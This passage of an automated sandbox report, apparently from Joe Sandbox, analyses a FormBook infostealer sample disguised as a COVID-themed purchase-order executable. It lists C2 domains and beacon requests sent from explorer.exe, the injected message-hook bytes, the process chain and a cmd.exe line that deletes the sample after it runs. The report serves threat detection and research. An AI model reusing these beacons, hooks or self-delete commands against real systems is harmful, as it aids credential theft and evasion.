                                                Jan 13, 2021 08:50:21.840061903 CET53634928.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:36.541491985 CET6083153192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:36.604506969 CET53608318.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:38.455226898 CET6010053192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:38.506031990 CET53601008.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:41.168618917 CET5319553192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:41.216862917 CET53531958.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:51.317357063 CET5014153192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:51.368170023 CET53501418.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:51.476964951 CET5302353192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:51.534848928 CET53530238.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:52.558315039 CET4956353192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:52.606209040 CET53495638.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:53.523490906 CET5135253192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:53.571402073 CET53513528.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:54.668806076 CET5934953192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:54.725231886 CET53593498.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:55.702863932 CET5708453192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:55.750634909 CET53570848.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:56.748745918 CET5882353192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:56.796597004 CET53588238.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:57.905464888 CET5756853192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:57.953366041 CET53575688.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:57.972630978 CET5054053192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:58.024038076 CET53505408.8.8.8192.168.2.3
                                                Jan 13, 2021 08:51:12.496237993 CET5436653192.168.2.38.8.8.8
                                                Jan 13, 2021 08:51:12.568166018 CET53543668.8.8.8192.168.2.3
                                                Jan 13, 2021 08:51:16.039330959 CET5303453192.168.2.38.8.8.8
                                                Jan 13, 2021 08:51:16.087538004 CET53530348.8.8.8192.168.2.3
                                                Jan 13, 2021 08:51:16.768254995 CET5776253192.168.2.38.8.8.8
                                                Jan 13, 2021 08:51:16.825938940 CET53577628.8.8.8192.168.2.3
                                                Jan 13, 2021 08:51:16.839108944 CET5543553192.168.2.38.8.8.8
                                                Jan 13, 2021 08:51:16.886858940 CET53554358.8.8.8192.168.2.3
                                                Jan 13, 2021 08:51:17.842907906 CET5071353192.168.2.38.8.8.8
                                                Jan 13, 2021 08:51:17.893759966 CET53507138.8.8.8192.168.2.3
                                                Jan 13, 2021 08:51:25.981870890 CET5613253192.168.2.38.8.8.8
                                                Jan 13, 2021 08:51:26.053591967 CET53561328.8.8.8192.168.2.3
                                                Jan 13, 2021 08:51:46.852432966 CET5898753192.168.2.38.8.8.8
                                                Jan 13, 2021 08:51:46.924470901 CET53589878.8.8.8192.168.2.3
                                                Jan 13, 2021 08:51:48.151747942 CET5657953192.168.2.38.8.8.8
                                                Jan 13, 2021 08:51:48.199973106 CET53565798.8.8.8192.168.2.3
                                                Jan 13, 2021 08:51:50.372817993 CET6063353192.168.2.38.8.8.8
                                                Jan 13, 2021 08:51:50.428982973 CET53606338.8.8.8192.168.2.3
                                                Jan 13, 2021 08:52:09.404354095 CET6129253192.168.2.38.8.8.8
                                                Jan 13, 2021 08:52:09.769263029 CET53612928.8.8.8192.168.2.3
                                                Jan 13, 2021 08:52:29.502216101 CET6361953192.168.2.38.8.8.8
                                                Jan 13, 2021 08:52:29.573985100 CET53636198.8.8.8192.168.2.3
                                                Jan 13, 2021 08:52:57.307991028 CET6493853192.168.2.38.8.8.8
                                                Jan 13, 2021 08:52:57.364401102 CET53649388.8.8.8192.168.2.3
                                                Jan 13, 2021 08:52:58.448940039 CET6194653192.168.2.38.8.8.8
                                                Jan 13, 2021 08:52:58.508014917 CET53619468.8.8.8192.168.2.3
                                                Jan 13, 2021 08:52:59.604159117 CET6491053192.168.2.38.8.8.8
                                                Jan 13, 2021 08:52:59.660727978 CET53649108.8.8.8192.168.2.3
                                                Jan 13, 2021 08:53:00.640948057 CET5212353192.168.2.38.8.8.8
                                                Jan 13, 2021 08:53:00.691749096 CET53521238.8.8.8192.168.2.3
                                                Jan 13, 2021 08:53:01.215671062 CET5613053192.168.2.38.8.8.8
                                                Jan 13, 2021 08:53:01.274918079 CET53561308.8.8.8192.168.2.3
                                                Jan 13, 2021 08:53:02.101735115 CET5633853192.168.2.38.8.8.8
                                                Jan 13, 2021 08:53:02.157994032 CET53563388.8.8.8192.168.2.3
                                                Jan 13, 2021 08:53:03.029258966 CET5942053192.168.2.38.8.8.8
                                                Jan 13, 2021 08:53:03.077163935 CET53594208.8.8.8192.168.2.3
                                                Jan 13, 2021 08:53:04.407246113 CET5878453192.168.2.38.8.8.8
                                                Jan 13, 2021 08:53:04.463922977 CET53587848.8.8.8192.168.2.3
                                                Jan 13, 2021 08:53:05.615227938 CET6397853192.168.2.38.8.8.8
                                                Jan 13, 2021 08:53:05.663167000 CET53639788.8.8.8192.168.2.3
                                                Jan 13, 2021 08:53:06.348125935 CET6293853192.168.2.38.8.8.8
                                                Jan 13, 2021 08:53:06.446002960 CET53629388.8.8.8192.168.2.3
                                                Jan 13, 2021 08:53:12.572185993 CET5570853192.168.2.38.8.8.8
                                                Jan 13, 2021 08:53:13.559467077 CET5570853192.168.2.38.8.8.8
                                                Jan 13, 2021 08:53:13.636240959 CET53557088.8.8.8192.168.2.3

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Jan 13, 2021 08:51:25.981870890 CET192.168.2.38.8.8.80x3fecStandard query (0)www.thesaltlifestyle.comA (IP address)IN (0x0001)
                                                Jan 13, 2021 08:51:46.852432966 CET192.168.2.38.8.8.80x5aadStandard query (0)www.aduhelmfinancialsupport.comA (IP address)IN (0x0001)
                                                Jan 13, 2021 08:52:09.404354095 CET192.168.2.38.8.8.80x70c8Standard query (0)www.scientificimaginetics.comA (IP address)IN (0x0001)
                                                Jan 13, 2021 08:52:29.502216101 CET192.168.2.38.8.8.80x249cStandard query (0)www.johnemotions.comA (IP address)IN (0x0001)
                                                Jan 13, 2021 08:53:12.572185993 CET192.168.2.38.8.8.80x53bfStandard query (0)www.steelyourselfshop.netA (IP address)IN (0x0001)
                                                Jan 13, 2021 08:53:13.559467077 CET192.168.2.38.8.8.80x53bfStandard query (0)www.steelyourselfshop.netA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Jan 13, 2021 08:51:26.053591967 CET8.8.8.8192.168.2.30x3fecNo error (0)www.thesaltlifestyle.comthesaltlifestyle.comCNAME (Canonical name)IN (0x0001)
                                                Jan 13, 2021 08:51:26.053591967 CET8.8.8.8192.168.2.30x3fecNo error (0)thesaltlifestyle.com34.102.136.180A (IP address)IN (0x0001)
                                                Jan 13, 2021 08:51:46.924470901 CET8.8.8.8192.168.2.30x5aadNo error (0)www.aduhelmfinancialsupport.com165.160.13.20A (IP address)IN (0x0001)
                                                Jan 13, 2021 08:51:46.924470901 CET8.8.8.8192.168.2.30x5aadNo error (0)www.aduhelmfinancialsupport.com165.160.15.20A (IP address)IN (0x0001)
                                                Jan 13, 2021 08:52:09.769263029 CET8.8.8.8192.168.2.30x70c8No error (0)www.scientificimaginetics.com154.92.73.140A (IP address)IN (0x0001)
                                                Jan 13, 2021 08:52:29.573985100 CET8.8.8.8192.168.2.30x249cNo error (0)www.johnemotions.com104.24.109.70A (IP address)IN (0x0001)
                                                Jan 13, 2021 08:52:29.573985100 CET8.8.8.8192.168.2.30x249cNo error (0)www.johnemotions.com104.24.108.70A (IP address)IN (0x0001)
                                                Jan 13, 2021 08:52:29.573985100 CET8.8.8.8192.168.2.30x249cNo error (0)www.johnemotions.com172.67.142.17A (IP address)IN (0x0001)
                                                Jan 13, 2021 08:53:13.636240959 CET8.8.8.8192.168.2.30x53bfName error (3)www.steelyourselfshop.netnonenoneA (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.thesaltlifestyle.com
                                                • www.aduhelmfinancialsupport.com
                                                • www.scientificimaginetics.com
                                                • www.johnemotions.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.34973634.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 13, 2021 08:51:26.099952936 CET4471OUTGET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct HTTP/1.1
                                                Host: www.thesaltlifestyle.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 13, 2021 08:51:26.238513947 CET4471INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Wed, 13 Jan 2021 07:51:26 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "5ffc83a1-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.349737165.160.13.2080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 13, 2021 08:51:47.060177088 CET4473OUTGET /p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1
                                                Host: www.aduhelmfinancialsupport.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 13, 2021 08:51:47.204091072 CET4473INHTTP/1.1 200 OK
                                                Connection: close
                                                Date: Wed, 13 Jan 2021 07:51:47 GMT
                                                Content-Length: 94
                                                X-ORACLE-DMS-ECID: ea9850e1-3635-4b18-92ae-e9076c77ad59-6e5b326b
                                                X-ORACLE-DMS-RID: 0
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.349740154.92.73.14080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 13, 2021 08:52:10.069588900 CET4493OUTGET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8 HTTP/1.1
                                                Host: www.scientificimaginetics.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 13, 2021 08:52:10.370596886 CET4493INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Wed, 13 Jan 2021 07:52:10 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1.0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.349741104.24.109.7080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 13, 2021 08:52:29.626843929 CET4494OUTGET /p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1
                                                Host: www.johnemotions.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 13, 2021 08:52:29.685899973 CET4495INHTTP/1.1 301 Moved Permanently
                                                Date: Wed, 13 Jan 2021 07:52:29 GMT
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Wed, 13 Jan 2021 08:52:29 GMT
                                                Location: https://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1
                                                cf-request-id: 079c546cdf000041322a3d0000000001
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=w99moivZwEdAiIc2yCtyAR0%2FANulYBqCpqCigrLpA%2FwtpANEJ0cKyvXA4kjcxYCQ9OtB5r2vufT9lf7t3ldGfJSk%2FfyPl3EDh5LIQKte1lnEAUpIaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 610d89c169fc4132-PRG
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Code Manipulations

                                                User Modules

                                                Hook Summary

                                                Function NameHook TypeActive in Processes
                                                PeekMessageAINLINEexplorer.exe
                                                PeekMessageWINLINEexplorer.exe
                                                GetMessageWINLINEexplorer.exe
                                                GetMessageAINLINEexplorer.exe

                                                Processes

                                                Process: explorer.exe, Module: user32.dll
                                                Function NameHook TypeNew Data
                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEA
                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEA
                                                GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEA
                                                GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEA

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Start time:08:50:13
                                                Start date:13/01/2021
                                                Path:C:\Users\user\Desktop\Po-covid19 2372#w2..exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
                                                Imagebase:0x70000
                                                File size:1304576 bytes
                                                MD5 hash:BF53C9DC0D0F032033C318ACEEF906C6
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.253062095.0000000002708000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:08:50:26
                                                Start date:13/01/2021
                                                Path:C:\Users\user\Desktop\Po-covid19 2372#w2..exe
                                                Wow64 process (32bit):false
                                                Commandline:{path}
                                                Imagebase:0x130000
                                                File size:1304576 bytes
                                                MD5 hash:BF53C9DC0D0F032033C318ACEEF906C6
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                General

                                                Start time:08:50:27
                                                Start date:13/01/2021
                                                Path:C:\Users\user\Desktop\Po-covid19 2372#w2..exe
                                                Wow64 process (32bit):true
                                                Commandline:{path}
                                                Imagebase:0x9b0000
                                                File size:1304576 bytes
                                                MD5 hash:BF53C9DC0D0F032033C318ACEEF906C6
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:08:50:31
                                                Start date:13/01/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:
                                                Imagebase:0x7ff714890000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:08:50:47
                                                Start date:13/01/2021
                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                Imagebase:0xbf0000
                                                File size:59904 bytes
                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:08:50:52
                                                Start date:13/01/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
                                                Imagebase:0xbf0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:08:50:53
                                                Start date:13/01/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6b2800000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis

                                                Reset < >